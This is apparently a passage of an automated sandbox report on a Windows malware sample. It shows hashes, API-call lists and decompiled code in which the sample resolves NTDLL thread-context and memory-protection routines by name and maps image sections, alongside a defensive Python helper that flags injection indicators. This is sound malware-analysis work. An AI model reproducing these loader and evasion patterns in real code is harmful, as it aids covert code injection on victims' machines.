                                          • Opcode ID: ec4e04f22a1356b29fd7da86dfeeed9d7195bb5ea3fbb5e8b171d9d02badf796
                                          • Instruction ID: a21fbd31fa73cd96ce7f0f9ad86b1fc9e1bbb749f081066c1b015170e11c4036
                                          • Opcode Fuzzy Hash: ec4e04f22a1356b29fd7da86dfeeed9d7195bb5ea3fbb5e8b171d9d02badf796
                                          • Instruction Fuzzy Hash: 9041DD31A01605FFEB219FA5DC45BAE7FB8FF45701F20412AF904AA292D7719E00DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcessId.KERNEL32(00000000,?), ref: 00AB20F2
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AB20FF
                                            • Part of subcall function 00AB2A4E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2A8E
                                            • Part of subcall function 00AB2A4E: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27
                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00AB21FE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessVirtual$AllocChangeCloseCurrentFindFreeNotificationOpen
                                          • String ID: NTDLL.DLL$ZwProtectVirtualMemory$ZwWriteVirtualMemory
                                          • API String ID: 1388074787-2238432915
                                          • Opcode ID: f355facfac8a20c10e48d15d421cbf627da715d51de8770d358a2dea80a0466a
                                          • Instruction ID: 0ea1abe7812574b4b94387aa2fc9fe26fa9d73f041ef1151f632d1b175ec9ba4
                                          • Opcode Fuzzy Hash: f355facfac8a20c10e48d15d421cbf627da715d51de8770d358a2dea80a0466a
                                          • Instruction Fuzzy Hash: 6F41A1B2D0020DBFDF019FD9DD41AEEBBBAFB48314F144129F610A2261D7319A619B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E00AB3003(void* __ecx, long _a4, void* _a8) {
                                          				signed int _v8;
                                          				_Unknown_base(*)()* _t9;
                                          				signed int _t11;
                                          				long _t19;
                                          				void* _t22;
                                          
                                          				_v8 = _v8 & 0x00000000;
                                          				_t9 =  *0xb16d88;
                                          				if(_t9 != 0) {
                                          					L2:
                                          					_t19 = _a4;
                                          					if(_t19 == 0) {
                                          						_t22 = _a8;
                                          					} else {
                                          						_t22 = OpenProcess(0x400, 0, _t19);
                                          						_t9 =  *0xb16d88;
                                          					}
                                          					if(_t22 != 0) {
                                          						_t11 =  *_t9(_t22,  &_v8);
                                          						asm("sbb eax, eax");
                                          						_v8 = _v8 &  ~_t11;
                                          						if(_t19 != 0) {
                                          							FindCloseChangeNotification(_t22); // executed
                                          						}
                                          					}
                                          					L9:
                                          					return _v8;
                                          				}
                                          				_t9 = GetProcAddress(GetModuleHandleW(L"KERNEL32.DLL"), "IsWow64Process");
                                          				 *0xb16d88 = _t9;
                                          				if(_t9 == 0) {
                                          					goto L9;
                                          				}
                                          				goto L2;
                                          			}

                                          Instruction addresses for the decompiled lines above: 0x00ab3007 to 0x00ab307c (per-line address column)

                                          APIs
                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,IsWow64Process,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB301E
                                          • GetProcAddress.KERNEL32(00000000), ref: 00AB3025
                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB3045
                                          • FindCloseChangeNotification.KERNELBASE(00AB14C8,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB306E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: AddressChangeCloseFindHandleModuleNotificationOpenProcProcess
                                          • String ID: IsWow64Process$KERNEL32.DLL
                                          • API String ID: 869619728-1193389583
                                          • Opcode ID: a8a629ba45bfdebf6d417575aea8ea21ea238532d8a78cd639851fea4d5229fd
                                          • Instruction ID: 819ec6078c268ac5cc9a7f60b68ddea59fb817b3fda966af75e8b3afa318736c
                                          • Opcode Fuzzy Hash: a8a629ba45bfdebf6d417575aea8ea21ea238532d8a78cd639851fea4d5229fd
                                          • Instruction Fuzzy Hash: C7018432A41604EBCB20EFB9EC49FEEB7BCAF40B15F154254F904E7252DB309E019690
                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E00AB3255(signed int __edx) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t1;
                                          				void* _t5;
                                          				signed int _t6;
                                          				signed int _t9;
                                          				char* _t12;
                                          				void* _t14;
                                          				signed int _t15;
                                          				void* _t17;
                                          				signed int* _t19;
                                          
                                          				_t15 = __edx;
                                          				_t1 =  *0xb16d68; // 0xbd51bcd0
                                          				_t19 = 0;
                                          				_t23 = _t1 |  *0xb16d6c;
                                          				if((_t1 |  *0xb16d6c) != 0) {
                                          					_t19 = 0xb16d68;
                                          				} else {
                                          					_t5 = OpenProcess(0x410, 0, GetCurrentProcessId()); // 0x410 = PROCESS_QUERY_INFORMATION | PROCESS_VM_READ on its own PID; the handle feeds the resolver below
                                          					_push("ZwGetContextThread");
                                          					_t12 = "NTDLL.DLL";
                                          					_t17 = _t5;
                                          					_push(_t12);
                                          					_push(_t17); // executed
                                          					_t6 = E00AB2A4E(_t12, _t14, _t17, 0, _t23); // executed; custom by-name export resolver (hProcess, DLL, export) returning a 64-bit value in edx:eax, so ZwGetContextThread never appears in the import table
                                          					 *0xb16d68 = _t6;
                                          					_t24 = _t6 | _t15;
                                          					 *0xb16d6c = _t15;
                                          					if((_t6 | _t15) != 0) {
                                          						_push("ZwSetContextThread");
                                          						_push(_t12);
                                          						_push(_t17); // executed
                                          						_t9 = E00AB2A4E(_t12, _t14, _t17, 0, _t24); // executed
                                          						 *0xb16d70 = _t9;
                                          						 *0xb16d74 = _t15;
                                          						if((_t9 | _t15) != 0) {
                                          							_t19 = 0xb16d68;
                                          						}
                                          					}
                                          					FindCloseChangeNotification(_t17); // executed
                                          				}
                                          				return _t19; // pointer to the cached {ZwGetContextThread, ZwSetContextThread} pair at 0xb16d68, or 0 if either lookup failed
                                          			}

                                          Instruction addresses for the decompiled lines above: 0x00ab3255 to 0x00ab32d5 (per-line address column)

                                          APIs
                                          • GetCurrentProcessId.KERNEL32(00000008,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3267
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3274
                                            • Part of subcall function 00AB2A4E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2A8E
                                            • Part of subcall function 00AB2A4E: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27
                                          • FindCloseChangeNotification.KERNELBASE(00000000,000004D0,00000008,00000000), ref: 00AB32C3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: ProcessVirtual$AllocChangeCloseCurrentFindFreeNotificationOpen
                                          • String ID: NTDLL.DLL$ZwGetContextThread$ZwSetContextThread
                                          • API String ID: 1388074787-3220980157
                                          • Opcode ID: d5100de36b3b92892806486825ca2e0114afb8a46c68e07a46ec00c14c43ba2d
                                          • Instruction ID: fd947956a64045e12a5dfb9fbf2bf1747a5e3e4104e497d1b678f5113e63596a
                                          • Opcode Fuzzy Hash: d5100de36b3b92892806486825ca2e0114afb8a46c68e07a46ec00c14c43ba2d
                                          • Instruction Fuzzy Hash: 8BF062B2F01610AB8721ABB4BC819FA377CFBA17543958436F50497122DA204D02CBF1
                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E00AB2813(void* __ecx, intOrPtr _a4, signed char _a8) {
                                          				struct HINSTANCE__* _t13;
                                          				void* _t15;
                                          				void* _t18;
                                          				signed int _t20;
                                          				signed int _t23;
                                          				signed char _t25;
                                          				void* _t26;
                                          				void* _t28;
                                          				signed int _t33;
                                          				signed int _t42;
                                          				signed int _t43;
                                          
                                          				_t26 = __ecx;
                                          				 *0xb16d4c = _a4;
                                          				_t33 = 0;
                                          				_t13 = GetModuleHandleA(0);
                                          				_t25 = _a8;
                                          				 *0xb16d48 = _t13;
                                          				if((_t25 & 0x00000001) != 0) { // init flag 0x1: cache the OS version
                                          					 *0xb16d40 = GetVersion();
                                          				}
                                          				if((_t25 & 0x00000002) == 0) { // init flag 0x2: refresh the cached PID at 0xb16d3c, otherwise reuse it
                                          					_t14 =  *0xb16d3c; // 0x1898
                                          				} else {
                                          					 *0xb16d3c = GetCurrentProcessId();
                                          				}
                                          				_t15 = E00AB3003(_t26, _t14, 0); // executed; the IsWow64Process helper above: bit 0 of 0xb16d44 records that the process runs under WoW64
                                          				_pop(_t28);
                                          				if(_t15 != 0) {
                                          					 *0xb16d44 =  *0xb16d44 | 0x00000001;
                                          				}
                                          				_t42 = _t25 & 0x00000004;
                                          				if(_t42 == 0) {
                                          					L9:
                                          					_t43 = _t25 & 0x00000008;
                                          					if(_t43 == 0) {
                                          						L12:
                                          						if((_t25 & 0x00000010) != 0) {
                                          							_t18 = CreateEventA(0, 1, 0, 0); // init flag 0x10: unnamed manual-reset event, initially non-signaled
                                          							 *0xb16d58 = _t18;
                                          							if(_t18 == 0) {
                                          								_t33 = GetLastError();
                                          							}
                                          						}
                                          						goto L15;
                                          					}
                                          					_t20 = E00AB29D6(_t28, 0, 0xb16d50);
                                          					asm("sbb esi, esi");
                                          					_t33 =  ~( ~_t20);
                                          					if(_t43 != 0) {
                                          						goto L15;
                                          					}
                                          					 *0xb16d5c =  &((StrRChrA( *0xb16d50, 0, 0x5c))[1]); // init flag 0x8: 0xb16d5c points at the file name after the last '\\' of the path E00AB29D6 stored at 0xb16d50
                                          					goto L12;
                                          				} else {
                                          					_t23 = E00AB29D6(_t28,  *0xb16d4c, 0xb16d54);
                                          					asm("sbb esi, esi");
                                          					_t33 =  ~( ~_t23);
                                          					_pop(_t28);
                                          					if(_t42 != 0) {
                                          						L15:
                                          						if(_t33 != 0) {
                                          							E00AB28F2();
                                          						}
                                          						return _t33;
                                          					}
                                          					goto L9;
                                          				}
                                          			}

                                          Instruction addresses for the decompiled lines above: 0x00ab2813 to 0x00ab28f1 (per-line address column)

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,00AB14C8,00000000), ref: 00AB2826
                                          • GetVersion.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB2839
                                          • GetCurrentProcessId.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB2849
                                          • StrRChrA.SHLWAPI(00000000,0000005C,?,?,?,00AB14C8,00000000), ref: 00AB28B5
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00AB14C8,00000000), ref: 00AB28CB
                                          • GetLastError.KERNEL32(?,?,?,00AB14C8,00000000), ref: 00AB28DA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: CreateCurrentErrorEventHandleLastModuleProcessVersion
                                          • String ID:
                                          • API String ID: 3503360540-0
                                          • Opcode ID: 1fb4248619b017bc5033b70d20e3002ce37646ba542872d2502539bcf50fa82b
                                          • Instruction ID: ee336ac0408b7da41b1992ee47b4b5898ae121f1eba99251c43f6e7619b02167
                                          • Opcode Fuzzy Hash: 1fb4248619b017bc5033b70d20e3002ce37646ba542872d2502539bcf50fa82b
                                          • Instruction Fuzzy Hash: 3D21CF31A402219FD7256BB9FC49BD57BBCAB45790F44823BE905DB6B2DF208C408B90
                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E00AB1E83(signed int __edx, void* _a4, intOrPtr _a8) {
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed int _t5;
                                          				signed int _t7;
                                          				signed int _t10;
                                          				signed int _t12;
                                          				signed int _t15;
                                          				signed int _t17;
                                          				void* _t19;
                                          				void* _t20;
                                          				signed int _t21;
                                          				char* _t22;
                                          				void* _t23;
                                          				void* _t24;
                                          				void* _t25;
                                          				void* _t26;
                                          
                                          				_t21 = __edx;
                                          				_t5 =  *0xb16d24; // 0xbd4ba770
                                          				_t23 = 0;
                                          				if((_t5 |  *0xb16d28) == 0) {
                                          					L3:
                                          					_t23 = 0x7f; // error code returned if any of the three ntdll lookups below fails
                                          					_push("LdrLoadDll");
                                          					_t22 = "NTDLL.DLL";
                                          					_push(_t22);
                                          					_push(_a8);
                                          					_t7 = E00AB2A4E(_t19, _t20, _t22, _t23, _t30); // executed; same by-name resolver as in E00AB3255, result cached as a 64-bit pair at 0xb16d24/0xb16d28
                                          					_t25 = _t24 + 0xc;
                                          					 *0xb16d24 = _t7;
                                          					_t31 = _t7 | _t21;
                                          					 *0xb16d28 = _t21;
                                          					if((_t7 | _t21) != 0) {
                                          						_push("LdrGetProcedureAddress");
                                          						_push(_t22);
                                          						_push(_a8);
                                          						_t10 = E00AB2A4E(_t19, _t20, _t22, _t23, _t31); // executed
                                          						_t26 = _t25 + 0xc;
                                          						 *0xb16d2c = _t10;
                                          						_t32 = _t10 | _t21;
                                          						 *0xb16d30 = _t21;
                                          						if((_t10 | _t21) != 0) {
                                          							_push("NtProtectVirtualMemory");
                                          							_push(_t22);
                                          							_push(_a8);
                                          							_t12 = E00AB2A4E(_t19, _t20, _t22, _t23, _t32); // executed
                                          							_t24 = _t26 + 0xc;
                                          							 *0xb16d34 = _t12;
                                          							 *0xb16d38 = _t21;
                                          							if((_t12 | _t21) != 0) {
                                          								_t23 = 0;
                                          								goto L7;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					_t15 =  *0xb16d2c; // 0xbd4fff60
                                          					if((_t15 |  *0xb16d30) == 0) {
                                          						goto L3;
                                          					} else {
                                          						_t17 =  *0xb16d34; // 0xbd51a980
                                          						_t30 = _t17 |  *0xb16d38;
                                          						if((_t17 |  *0xb16d38) != 0) {
                                          							L7:
                                          							memcpy(_a4, 0xb16d24, 0x18); // hand the caller the three cached 8-byte entries: LdrLoadDll, LdrGetProcedureAddress, NtProtectVirtualMemory
                                          						} else {
                                          							goto L3;
                                          						}
                                          					}
                                          				}
                                          				return _t23;
                                          			}

                                          Instruction addresses for the decompiled lines above: 0x00ab1e83 to 0x00ab1f32 (per-line address column)

                                          APIs
                                          • memcpy.NTDLL(00000000,00B16D24,00000018,?,?,?,?,?,?,00AB1C81,00000000,?), ref: 00AB1F25
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: LdrGetProcedureAddress$LdrLoadDll$NTDLL.DLL$NtProtectVirtualMemory
                                          • API String ID: 3510742995-862099514
                                          • Opcode ID: 946d01cc20d9ee634e81d7544513cd1c8f17ea29ac13f3dd05b2777351a7c32b
                                          • Instruction ID: 1c0de0440e317bbd465dc57229efc712dba51330fd9a60417cac153562080b10
                                          • Opcode Fuzzy Hash: 946d01cc20d9ee634e81d7544513cd1c8f17ea29ac13f3dd05b2777351a7c32b
                                          • Instruction Fuzzy Hash: ED1112B1B11504B7C761AF69FD42AD27BA8EB94750794C53AF80897132E7329A14C790
                                          Uniqueness Score: -1.00%

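                                          The "APIs" lists attached to the function blocks above (the E00AB3003 and E00AB3255 blocks, for instance) record every call with its raw argument dwords, which is where a triage analyst reads the process access rights and allocation flags from. The Python below is an added example, not part of the Joe Sandbox report and not the sample's code: it parses lines in that shape, decodes the OpenProcess, VirtualAlloc and VirtualFree masks, and flags the combinations that can actually write into or execute inside a process. The sample lines are copied from the blocks above; the line format is assumed from what this page shows, and CONSTRUCTED_RWX_LINE and every function and constant name are mine.

```python
"""Parse the "APIs" lines of a Joe Sandbox function block and decode the
Win32 masks they carry.  Added example; not part of the report or the sample."""
import re
from typing import Dict, List, NamedTuple, Optional

# Constructed sample input: six API lines copied in the shape the report
# prints them (E00AB3003 and E00AB3255 blocks above), not the whole report.
SAMPLE_API_LINES = """\
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,IsWow64Process,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB301E
• OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,?,?,00AB2862,00001898,00000000,?,?,?,00AB14C8,00000000), ref: 00AB3045
• OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3274
  • Part of subcall function 00AB2A4E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,000004D0,00000008,00000000), ref: 00AB2A8E
  • Part of subcall function 00AB2A4E: VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,000004D0,00000008,00000000), ref: 00AB2B27
• FindCloseChangeNotification.KERNELBASE(00000000,000004D0,00000008,00000000), ref: 00AB32C3
"""

# Constructed line, NOT taken from this report: only exercises the RWX-allocation check.
CONSTRUCTED_RWX_LINE = "• VirtualAlloc.KERNELBASE(00000000,00001000,00003000,00000040), ref: 00000000"

# Bit names from winnt.h / memoryapi.h.
PROCESS_ACCESS: Dict[int, str] = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
MEM_TYPE: Dict[int, str] = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE",
                            0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}
PAGE_PROTECT: Dict[int, str] = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Rights that let a caller change or run code in the opened process.
WRITE_INTO_PROCESS = 0x0002 | 0x0008 | 0x0020  # CREATE_THREAD | VM_OPERATION | VM_WRITE

# "• Api.MODULE(arg,arg,...), ref: ADDR", optionally prefixed by the subcall marker.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


class ApiCall(NamedTuple):
    api: str
    module: str
    args: List[Optional[int]]  # None for '?' (value unknown to the sandbox) and string arguments
    ref: int                   # call-site address
    subcall: Optional[str]     # function the call was reported under, if it is a subcall line


def _arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Return one ApiCall per line that matches the report's API-line shape; other lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [_arg(t) for t in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"]))
    return calls


def decode_flags(mask: int, table: Dict[int, str]) -> List[str]:
    """Names of the table bits set in mask, lowest bit first; the raw hex if none match."""
    names = [name for bit, name in sorted(table.items()) if mask & bit]
    return names or [hex(mask)]


def describe(call: ApiCall) -> str:
    """Render one call with its masks decoded; falls back to the bare API name."""
    a, ref = call.args, "%08X" % call.ref
    if call.api == "OpenProcess" and len(a) >= 1 and a[0] is not None:
        return "OpenProcess(%s) @ %s" % ("|".join(decode_flags(a[0], PROCESS_ACCESS)), ref)
    if call.api == "VirtualAlloc" and len(a) >= 4 and a[2] is not None and a[3] is not None:
        return "VirtualAlloc(%s, %s) @ %s" % (
            "|".join(decode_flags(a[2], MEM_TYPE)), "|".join(decode_flags(a[3], PAGE_PROTECT)), ref)
    if call.api == "VirtualFree" and len(a) >= 3 and a[2] is not None:
        return "VirtualFree(%s) @ %s" % ("|".join(decode_flags(a[2], MEM_TYPE)), ref)
    return "%s @ %s" % (call.api, ref)


def injection_indicators(calls: List[ApiCall]) -> List[str]:
    """Calls that could write or run code in a process: OpenProcess with write/thread
    rights, or an allocation that is both writable and executable (RWX / WCX)."""
    hits: List[str] = []
    for c in calls:
        a = c.args
        if c.api == "OpenProcess" and a and a[0] is not None and a[0] & WRITE_INTO_PROCESS:
            hits.append(describe(c))
        elif c.api == "VirtualAlloc" and len(a) >= 4 and a[3] is not None and a[3] & 0xC0:
            hits.append(describe(c))
    return hits


if __name__ == "__main__":
    for call in parse_api_lines(SAMPLE_API_LINES):
        print(describe(call))
    print("indicators:", injection_indicators(parse_api_lines(SAMPLE_API_LINES)))
```

                                          For the lines on this page the helper reports nothing: both OpenProcess calls ask only for PROCESS_QUERY_INFORMATION (0x400) and PROCESS_QUERY_INFORMATION | PROCESS_VM_READ (0x410, on the sample's own PID), and the resolver's VirtualAlloc is a plain read-write MEM_COMMIT | MEM_RESERVE. These blocks only resolve and cache the ZwGetContextThread, ZwSetContextThread and NtProtectVirtualMemory pointers; the calls that use them are not in the blocks shown here.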
                                          C-Code - Quality: 90%
                                          			E00AB1B12(void* __ebx, signed int __edx, intOrPtr* _a4, signed int _a8) {
                                          				char _v8;
                                          				char _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				signed int _v24;
                                          				signed int _t49;
                                          				int _t51;
                                          				void* _t54;
                                          				void* _t60;
                                          				int _t77;
                                          				int _t78;
                                          				void* _t79;
                                          				void* _t85;
                                          				void* _t87;
                                          				signed int _t90;
                                          				int _t92;
                                          				int _t98;
                                          				int _t100;
                                          				void* _t102;
                                          				signed int _t104;
                                          				void* _t105;
                                          				void* _t107;
                                          				void* _t108;
                                          
                                          				_t104 = __edx;
                                          				_t87 = __ebx;
                                          				_v20 = E00AB2369;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_v16 = 0;
                                          				_t49 = _a8 & 0x00000010;
                                          				_v24 = _t49;
                                          				if(_t49 != 0 || ( *0xb16d44 & 0x00000001) == 0) {
                                          					_t105 =  *0xb16cf4; // 0xab6000
                                          				} else {
                                          					_t105 =  *0xb16cfc; // 0xae1000
                                          					_v20 = 0xb169d8;
                                          				}
                                          				if(_t105 != 0) {
                                          					_t10 = _t105 + 0x3c; // 0x100
                                          					_t92 =  *0xb16d04; // 0x2b000
                                          					_push(_t87);
                                          					_t51 =  *0xb16d08; // 0x35800
                                          					_t90 =  *((intOrPtr*)( *_t10 + _t105 + 0x50)) + 0x00000fff & 0xfffff000;
                                          					_t54 = E00AB2591(_t51 + _t92 + 0xc50 + _t90,  &_v8,  &_v16); // executed
                                          					_t108 = _t54;
                                          					if(_t108 == 0) {
                                          						_t60 = E00AB27C1(_v16,  *_a4,  &_v12); // executed
                                          						_t108 = _t60;
                                          						if(_t108 == 0) {
                                          							_t108 = E00AB2650(_v8, _t105, _v12);
                                          							if(_t108 == 0) {
                                          								memcpy(_v8 + 0xc50 + _t90,  *0xb16cf4,  *0xb16d04);
                                          								_t98 =  *0xb16d04; // 0x2b000
                                          								memcpy(_v8 + 0xc50 + _t98 + _t90,  *0xb16cfc,  *0xb16d08);
                                          								_t107 = _v8 + _t90;
                                          								asm("cdq");
                                          								 *((intOrPtr*)(_t107 + 0x30)) = _v12;
                                          								 *((intOrPtr*)(_t107 + 0x34)) = _t104;
                                          								asm("cdq");
                                          								 *((intOrPtr*)(_t107 + 0x18)) = _v12 + 0xc50 + _t90;
                                          								 *((intOrPtr*)(_t107 + 0x1c)) = _t104;
                                          								_t100 =  *0xb16d04; // 0x2b000
                                          								_t101 = _t100 + _t90;
                                          								asm("cdq");
                                          								 *((intOrPtr*)(_t107 + 0x20)) = _v12 + 0xc50 + _t100 + _t90;
                                          								 *((intOrPtr*)(_t107 + 0x24)) = _t104;
                                          								_t77 =  *0xb16d04; // 0x2b000
                                          								 *(_t107 + 0x28) = _t77;
                                          								_t78 =  *0xb16d08; // 0x35800
                                          								 *(_t107 + 0x2c) = _t78;
                                          								if(_v24 != _t108 || ( *0xb16d44 & 0x00000001) == 0) {
                                          									_t79 = E00AB1DD0(_t101, _t104, _t107);
                                          								} else {
                                          									_t79 = E00AB1E83(_t104, _t107,  *_a4); // executed
                                          								}
                                          								_t108 = _t79;
                                          								_pop(_t102);
                                          								if(_t108 == 0) {
                                          									_t39 = _t107 + 0x40; // 0x40
                                          									memcpy(_t39, _v20, 0x800);
                                          									_t85 = E00AB2961(_t102, _t104, _a4, _v12 + _t90 + 0x40, _v12 + _t90, _a8); // executed
                                          									_t108 = _t85;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					if(_v8 != 0) {
                                          						E00AB27FB(0xffffffff, _v8); // executed
                                          					}
                                          					if(_v16 != 0) {
                                          						FindCloseChangeNotification(_v16); // executed
                                          					}
                                          					goto L19;
                                          				} else {
                                          					_t108 = 2;
                                          					L19:
                                          					return _t108;
                                          				}
                                          			}

                                          APIs
                                          • memcpy.NTDLL(-00000C50,?,?,?,?,?,?,00000000,00000000,?), ref: 00AB1BF3
                                          • memcpy.NTDLL(-00000C50,-00000C50,?,?,?,?,?,?,00000000,00000000,?), ref: 00AB1C17
                                          • memcpy.NTDLL(00000040,00AB2369,00000800,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00AB1C9D
                                            • Part of subcall function 00AB1DD0: GetModuleHandleW.KERNEL32(NTDLL.DLL,00000000,00000000,?,00AB1C8A,00000000), ref: 00AB1E06
                                            • Part of subcall function 00AB1DD0: memcpy.NTDLL(00AB1C8A,00B16D0C,00000018,?,00AB1C8A,00000000), ref: 00AB1E75
                                            • Part of subcall function 00AB2961: memset.NTDLL ref: 00AB297F
                                            • Part of subcall function 00AB2961: LocalFree.KERNEL32(00000000), ref: 00AB29CA
                                          • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?), ref: 00AB1CD8
                                            • Part of subcall function 00AB27FB: NtUnmapViewOfSection.NTDLL(00AB1CCD,?), ref: 00AB2804
                                            • Part of subcall function 00AB27FB: RtlNtStatusToDosError.NTDLL ref: 00AB280B
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
